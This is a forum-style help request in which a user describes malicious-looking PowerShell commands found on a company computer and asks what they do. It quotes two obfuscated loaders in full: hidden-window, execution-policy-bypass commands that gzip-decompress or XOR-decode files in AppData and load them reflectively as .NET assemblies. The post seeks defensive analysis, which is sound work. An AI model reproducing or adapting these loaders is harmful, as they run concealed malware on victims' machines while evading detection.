We detected the scripts below on one of our computers this morning. I’m pretty sure they are malicious based on how they look and what they appear to be doing. The folders they reference contain dozens of files with random file names and extensions. They also appear to be tied to some startup process or program.
Where I fall short is understanding what these scripts are actually doing and I’m hoping I can get some help. I understand that the scripts are running as hidden, setting the execution policy as bypass, and then calling a script block. After that it seems to either call, create, or manipulate objects and then connecting to files.
“PowerShell.exe” -windOWStYLe hIddEN -eP BYpASs -commAnD “[sYsTem.refLEcTion.ASsEmBly]::LoAD({$a7118bfda6d4b8af0cb14447ec219=NEW-ObJeCt SYStEm.IO.MEMorySTreAm(, $ArGS[0]);$abab1a4d8b348e881f740374eb4eb=neW-oBject SystEM.IO.mEmoRYsTReAM;$a41c73041894c69d901cdb652dcd8=NeW-oBjeCT SYSteM.IO.cOmPRESsIOn.gZipstrEAM $a7118bfda6d4b8af0cb14447ec219, ([IO.COmprESsIon.comPReSSioNmODE]::DecOmPrEss);$a41c73041894c69d901cdb652dcd8.coPyTO($abab1a4d8b348e881f740374eb4eb);$a41c73041894c69d901cdb652dcd8.CLose();$a7118bfda6d4b8af0cb14447ec219.CLOse();reTuRN $abab1a4d8b348e881f740374eb4eb.toaRRay();}.inVoKE([SYsteM.Io.fiLE]::REadALlByteS(‘C:\Users\jdoe\AppData\Roaming\aDobe\TefpYOdEvcLAk\ZeoLwxHmUPAuRViqY.MiOzuJQlZGYeaEq’)));[abe9358f57541eab841f83b9a944d.a3e8233974540f924b73c817a287c]::ac7f32ed5624da88d2fee302b2b18()”
“PowerShell.exe” -wINDoWStYLe hIDDEN -eP BypasS -comMand “$a7997fcd41e4a3b768a6bf953e6cc=‘QHJTM01eTkBtP0B8S3M2Xm81WUpAUzImMUB7Nk9oXlBqKGhAcjl3OV4wS09mQHZnWHVAd0teKUB0JV5QXlBqZXhAVU19Y0B1LUg3QFY+ZDBeMHVfUS0/O0ZzdyFpWVVxQE1Ad2tZbkB3fmpHPlg0ZkFnU0BFb3NHKitvbVotaC1rQ1REKG9QZVY2bld2UVN4fllmamdOKld6eHhlT3luZWVga3JTcTFkd2VxeChqUGpEQnFWbHgwal97a2p5entTdmxKS2pLeEFCXnJoVnpHIW9BWiYwelc=’;$a77abf52b7d407808df1ba9745490=[sySTEm.IO.filE]::rEAdALLbytES(‘C:\Users\jdoe\AppData\Roaming\mIcROSoFt\YOSEmKhDtVvawIMuCQk\dZBIhKAtEGYsg.qNyFOJtMwvWmEfZ’);fOr($aa9ae30d8304f0b78e86582ea3b85=0;$aa9ae30d8304f0b78e86582ea3b85 -Lt $a77abf52b7d407808df1ba9745490.COUNT;){FOr($a439a9ddd664bfbdee23d2c082e8b=0;$a439a9ddd664bfbdee23d2c082e8b -lT $a7997fcd41e4a3b768a6bf953e6cc.lEnGtH;$a439a9ddd664bfbdee23d2c082e8b++){$a77abf52b7d407808df1ba9745490[$aa9ae30d8304f0b78e86582ea3b85]=$a77abf52b7d407808df1ba9745490[$aa9ae30d8304f0b78e86582ea3b85] -BXoR $a7997fcd41e4a3b768a6bf953e6cc[$a439a9ddd664bfbdee23d2c082e8b];$aa9ae30d8304f0b78e86582ea3b85++;IF($aa9ae30d8304f0b78e86582ea3b85 -ge $a77abf52b7d407808df1ba9745490.cOuNT){$a439a9ddd664bfbdee23d2c082e8b=$a7997fcd41e4a3b768a6bf953e6cc.LengTH}}};[SYSTem.ReFlectIOn.aSsEmbLY]::loaD($a77abf52b7d407808df1ba9745490);[aa1d6f4e60d4f0b9a10f9031f4877.af35bb34041454ba3d18c1a462992]::a2be604cdf64df868f7a43ea5911b()”
Any help would be appreciated,
James